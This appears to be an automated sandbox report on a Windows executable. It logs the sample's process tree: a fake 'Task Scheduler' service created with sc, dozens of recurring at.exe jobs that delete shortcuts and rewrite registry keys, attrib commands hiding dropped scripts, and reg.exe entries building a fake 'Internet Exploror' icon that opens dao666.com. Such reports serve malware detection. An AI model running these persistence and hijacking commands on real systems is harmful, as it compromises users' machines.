1e9da086434a0a907227a3ed6ceb1ae7c72bde2e69508a9113efbcb380d50545

Analysis

max time kernel
1s
max time network
141s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
25/12/2023, 21:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3d30118b8a95a19674d74d59bc15ae64.exe
Size

96KB
MD5

3d30118b8a95a19674d74d59bc15ae64
SHA1

2411fa9b01150e8a23a8b12e7b60a953c2a4866f
SHA256

1e9da086434a0a907227a3ed6ceb1ae7c72bde2e69508a9113efbcb380d50545
SHA512

2359c50ca178b256f54cc9031825cfc636d0031fa5d3dcaa6db7a08c52134ae6b3afbc1f7bc4b2660fd2bb4f5859aa07e026468602ae7c2fa5e47b63d9ce4cd1
SSDEEP

1536:igYPhQXwIiPrrjThO+lUBrzCxry1ec7rUyj239au7538iJkZgyfv:FYP2XerzhOUxu/XUtauF8iJkZgu

Score

8^/10

evasion persistence

Malware Config

Signatures

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Sets file to hidden 1 TTPs 6 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2816	attrib.exe
2188	attrib.exe
2684	attrib.exe
2628	attrib.exe
3048	attrib.exe
2600	attrib.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2476	sc.exe
1868	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 2696	2168	3d30118b8a95a19674d74d59bc15ae64.exe	28
PID 2168 wrote to memory of 2696	2168	3d30118b8a95a19674d74d59bc15ae64.exe	28
PID 2168 wrote to memory of 2696	2168	3d30118b8a95a19674d74d59bc15ae64.exe	28
PID 2168 wrote to memory of 2696	2168	3d30118b8a95a19674d74d59bc15ae64.exe	28
PID 2168 wrote to memory of 2696	2168	3d30118b8a95a19674d74d59bc15ae64.exe	28
PID 2168 wrote to memory of 2696	2168	3d30118b8a95a19674d74d59bc15ae64.exe	28
PID 2168 wrote to memory of 2696	2168	3d30118b8a95a19674d74d59bc15ae64.exe	28

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2628	attrib.exe
3048	attrib.exe
2600	attrib.exe
2816	attrib.exe
2188	attrib.exe
2684	attrib.exe

C:\Users\Admin\AppData\Local\Temp\3d30118b8a95a19674d74d59bc15ae64.exe
"C:\Users\Admin\AppData\Local\Temp\3d30118b8a95a19674d74d59bc15ae64.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ha.vbs"
  2⤵
  PID:2696
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao666.com/index2.html?cn
    3⤵
    PID:2732
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao666.com/index2.html?cn
      4⤵
      PID:1716
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\runonce.cmd
    3⤵
    PID:1460
  - - C:\Windows\SysWOW64\sc.exe
      sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
      4⤵
      Launches sc.exe
      PID:2476
  - - C:\Windows\SysWOW64\sc.exe
      sc config Schedule start= auto
      4⤵
      Launches sc.exe
      PID:1868
  - - C:\Windows\SysWOW64\net.exe
      net start "Task Scheduler"
      4⤵
      PID:1808
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start "Task Scheduler"
        5⤵
        
        PID:980
  - - C:\Windows\SysWOW64\at.exe
      at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1340
  - - C:\Windows\SysWOW64\at.exe
      at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2044
  - - C:\Windows\SysWOW64\at.exe
      at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:788
  - - C:\Windows\SysWOW64\at.exe
      at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:304
  - - C:\Windows\SysWOW64\at.exe
      at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2544
  - - C:\Windows\SysWOW64\at.exe
      at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2472
  - - C:\Windows\SysWOW64\at.exe
      at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2444
  - - C:\Windows\SysWOW64\at.exe
      at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2460
  - - C:\Windows\SysWOW64\at.exe
      at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2096
  - - C:\Windows\SysWOW64\at.exe
      at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1804
  - - C:\Windows\SysWOW64\at.exe
      at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1420
  - - C:\Windows\SysWOW64\at.exe
      at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:628
  - - C:\Windows\SysWOW64\at.exe
      at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2388
  - - C:\Windows\SysWOW64\at.exe
      at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2296
  - - C:\Windows\SysWOW64\at.exe
      at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1336
  - - C:\Windows\SysWOW64\at.exe
      at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:968
  - - C:\Windows\SysWOW64\at.exe
      at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1380
  - - C:\Windows\SysWOW64\at.exe
      at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1772
  - - C:\Windows\SysWOW64\at.exe
      at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1364
  - - C:\Windows\SysWOW64\at.exe
      at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:932
  - - C:\Windows\SysWOW64\at.exe
      at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2000
  - - C:\Windows\SysWOW64\at.exe
      at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2108
  - - C:\Windows\SysWOW64\at.exe
      at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2348
  - - C:\Windows\SysWOW64\at.exe
      at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2864
  - - C:\Windows\SysWOW64\at.exe
      at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2764
  - - C:\Windows\SysWOW64\at.exe
      at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2528
  - - C:\Windows\SysWOW64\at.exe
      at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2020
  - - C:\Windows\SysWOW64\at.exe
      at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2260
  - - C:\Windows\SysWOW64\at.exe
      at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1608
  - - C:\Windows\SysWOW64\at.exe
      at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2616
  - - C:\Windows\SysWOW64\at.exe
      at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1960
  - - C:\Windows\SysWOW64\at.exe
      at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1372
  - - C:\Windows\SysWOW64\at.exe
      at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2172
  - - C:\Windows\SysWOW64\at.exe
      at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2496
  - - C:\Windows\SysWOW64\at.exe
      at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:344
  - - C:\Windows\SysWOW64\at.exe
      at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1004
  - - C:\Windows\SysWOW64\at.exe
      at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2144
  - - C:\Windows\SysWOW64\at.exe
      at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2412
  - - C:\Windows\SysWOW64\at.exe
      at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2120
  - - C:\Windows\SysWOW64\at.exe
      at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2448
  - - C:\Windows\SysWOW64\at.exe
      at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2116
  - - C:\Windows\SysWOW64\at.exe
      at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2312
  - - C:\Windows\SysWOW64\at.exe
      at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2388
  - - C:\Windows\SysWOW64\at.exe
      at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2296
  - - C:\Windows\SysWOW64\at.exe
      at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1236
  - - C:\Windows\SysWOW64\at.exe
      at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1648
  - - C:\Windows\SysWOW64\at.exe
      at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:936
  - - C:\Windows\SysWOW64\at.exe
      at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1536
  - - C:\Windows\SysWOW64\at.exe
      at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1364
  - - C:\Windows\SysWOW64\at.exe
      at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:916
  - - C:\Windows\SysWOW64\at.exe
      at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1032
  - - C:\Windows\SysWOW64\at.exe
      at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:1712
  - - C:\Windows\SysWOW64\at.exe
      at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
      4⤵
      PID:1620
  - - C:\Windows\SysWOW64\at.exe
      at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:2052
  - - C:\Windows\SysWOW64\at.exe
      at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:2956
  - - C:\Windows\SysWOW64\at.exe
      at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:2468
  - - C:\Windows\SysWOW64\at.exe
      at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
      4⤵
      PID:1616
  - - C:\Windows\SysWOW64\at.exe
      at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:368
  - - C:\Windows\SysWOW64\at.exe
      at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:1652
  - - C:\Windows\SysWOW64\at.exe
      at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:1764
  - - C:\Windows\SysWOW64\at.exe
      at 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
      4⤵
      PID:1768
  - - C:\Windows\SysWOW64\at.exe
      at 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:2156
  - - C:\Windows\SysWOW64\at.exe
      at 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:2984
  - - C:\Windows\SysWOW64\at.exe
      at 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:2540
  - - C:\Windows\SysWOW64\at.exe
      at 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
      4⤵
      PID:2192
  - - C:\Windows\SysWOW64\at.exe
      at 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:1680
  - - C:\Windows\SysWOW64\at.exe
      at 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:2480
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\tool.cmd
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\copy.cmd
    3⤵
    PID:2716
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\Windows\36OSE.vbs"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2816
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\tool.cmd"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2188
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\360.cmd"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2684
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\361.cmd"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2628
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\Windows\360SE.vbs"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:3048
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\fav\fav.cmd"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2600
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\360.cmd
    3⤵
    PID:2768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\cpa.cmd
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del .\runonce.cmd
    3⤵
    PID:828

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
1⤵
PID:1264

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
1⤵
PID:780

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
1⤵
PID:1308

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
1⤵
PID:1148

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
1⤵
PID:1504

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
1⤵
PID:1500

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
1⤵
PID:2640

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
1⤵
PID:2856

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
1⤵
PID:2872

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
1⤵
PID:2888

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
1⤵
PID:2516

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
1⤵
PID:1824

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
1⤵
PID:1052

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
1⤵
PID:1608

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
1⤵
PID:1640

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
1⤵
PID:2936

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
1⤵
PID:2528

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
1⤵
PID:2920

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
1⤵
PID:2864

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
1⤵
PID:2876

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
1⤵
PID:828

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1716 CREDAT:275457 /prefetch:2
1⤵
PID:2576

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
1⤵
PID:1376

C:\Windows\SysWOW64\reg.exe
